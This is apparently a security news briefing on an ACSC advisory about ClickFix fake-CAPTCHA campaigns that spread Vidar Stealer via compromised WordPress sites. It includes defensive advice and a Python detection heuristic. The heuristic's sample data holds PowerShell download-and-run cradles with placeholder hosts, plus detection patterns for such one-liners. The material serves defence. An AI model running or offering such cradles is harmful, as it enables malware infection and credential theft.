What happened
The Australian Signals Directorate’s Australian Cyber Security Centre issued an advisory on May 7, 2026, warning organizations of an active campaign using the ClickFix social engineering technique to distribute Vidar Stealer malware through compromised WordPress websites. The ACSC confirmed the activity has been targeting Australian infrastructure and organizations across multiple sectors since early 2026.
ClickFix is a social engineering technique that tricks users into manually executing malicious PowerShell commands by presenting fake CAPTCHA or Cloudflare verification prompts on compromised websites. Because the user enters the command themselves, the technique bypasses many automated security controls that would otherwise block malware delivery. In this campaign, compromised WordPress sites redirect visitors to pages displaying fake verification prompts that copy a malicious PowerShell command to the clipboard and instruct the user to paste and run it, resulting in a Vidar Stealer infection.
Vidar Stealer is a malware-as-a-service infostealer active since 2018 that targets browser passwords, cookies, cryptocurrency wallets, autofill data, MFA tokens, and system details. It employs defense evasion techniques including self-deletion of its initial executable and operating primarily in memory after execution to reduce forensic artifacts. The malware retrieves command-and-control addresses through dead-drop mechanisms on public services including Telegram bots and Steam profiles. Browser session cookies captured by Vidar can allow attackers to bypass both passwords and active MFA sessions.
Who is affected
Australian organizations and infrastructure operators across multiple sectors are the confirmed targets of this specific campaign. The ClickFix technique itself is not geographically limited, and similar campaigns have been documented globally. Organizations running WordPress-based websites are also indirectly affected as potential delivery infrastructure for the attacks.
Why CISOs should care
ClickFix’s effectiveness comes from removing the malware from the delivery chain entirely. There is no malicious attachment, no drive-by download, and no exploit to detect. The user is the delivery mechanism. That makes this technique particularly resistant to traditional email security controls, endpoint detection of downloaded files, and network-based malware filtering, because the payload arrives only after the user has been socially engineered into executing a command that security tools perceive as user-initiated activity.
The combination of Vidar’s MFA bypass capability through stolen session cookies and its memory-resident operation after execution makes detection and containment after initial infection significantly harder than with more conventional malware families.
3 practical actions
- Restrict PowerShell execution to authorized users and scripts through application control policies: ClickFix depends on users being able to execute arbitrary PowerShell commands. Group Policy or endpoint protection policies that restrict PowerShell execution to signed scripts or specific authorized users directly interrupt the attack chain before the payload can be delivered.
- Audit and harden WordPress websites operated by your organization: Compromised WordPress sites are both the delivery infrastructure and a reputational risk for affected organizations. Verify that plugins and themes are current, enforce strong administrative credentials, and implement file integrity monitoring to detect unauthorized modifications that may indicate the site has been compromised for use in ClickFix campaigns.
- Train employees to recognize fake CAPTCHA and browser verification prompts requesting command execution: The social engineering element is the attack’s only delivery path. Security awareness training should explicitly cover the scenario of being asked to copy and paste a command into PowerShell or the Run dialog as part of a verification or troubleshooting step, treating any such prompt as a high-confidence indicator of a ClickFix attack.
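A detection heuristic for the ClickFix execution pattern described above (a shell launched from explorer.exe via the Run dialog or a manual start, with a pasted download-and-run one-liner), as an added example that is not part of the ACSC advisory or this briefing; the process-creation records are constructed samples with placeholder hosts, not indicators from the campaign.

```python
import re

# Constructed sample process-creation records (Sysmon Event ID 1 style fields);
# hosts and command strings are placeholders, not indicators from the ACSC advisory.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iex (irm https://verify.example.invalid/check)"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -ExecutionPolicy Bypass -EncodedCommand BASE64_PLACEHOLDER"},
    {"ParentImage": r"C:\Windows\explorer.exe",  # benign: admin opened an interactive shell
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c dir"},
]
INTERACTIVE_PARENTS = {"explorer.exe"}  # Run dialog / Start menu launches
SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "mshta.exe"}

# Fragments typical of a pasted download-and-run one-liner; each hit adds one point.
CRADLE_PATTERNS = {
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(c|nc|ncodedcommand)?\b", re.I),
    "policy_bypass": re.compile(r"-ex(ecutionpolicy)?\s+bypass", re.I),
    "remote_exec": re.compile(r"\b(iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring)\b", re.I),
    "url": re.compile(r"https?://", re.I),
}

def score_event(ev: dict) -> tuple[int, list[str]]:
    """Score one record for ClickFix-like execution; returns (score, reasons)."""
    image = ev["Image"].rsplit("\\", 1)[-1].lower()
    parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
    if image not in SHELL_IMAGES:
        return 0, []
    reasons = []
    if parent in INTERACTIVE_PARENTS:
        reasons.append("shell launched from explorer.exe (Run dialog or manual start)")
    reasons += [name for name, pat in CRADLE_PATTERNS.items() if pat.search(ev["CommandLine"])]
    return len(reasons), reasons

def flag_clickfix(events: list[dict], threshold: int = 3) -> list[tuple[dict, list[str]]]:
    """Return records scoring at or above the threshold, with the reasons that fired."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev, reasons))
    return hits
```

The threshold keeps an administrator's plain interactive shell (one point for the explorer.exe parent) below the alerting line while a hidden-window or encoded cradle launched the same way scores three or more.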
Also in the news today:
- Fake Claude AI Website Delivers New Beagle Windows Backdoor via Malvertising
- NVIDIA Confirms GeForce NOW Data Breach Affecting Armenian Regional Partner
- Zara Data Breach Exposed Personal Information of 197,000 People
- Ivanti Warns of New EPMM Flaw Exploited in Zero-Day Attacks
- Polish Intelligence Warns Hackers Attacked Water Treatment Control Systems
- New TCLBanker Malware Self-Spreads Over WhatsApp and Outlook
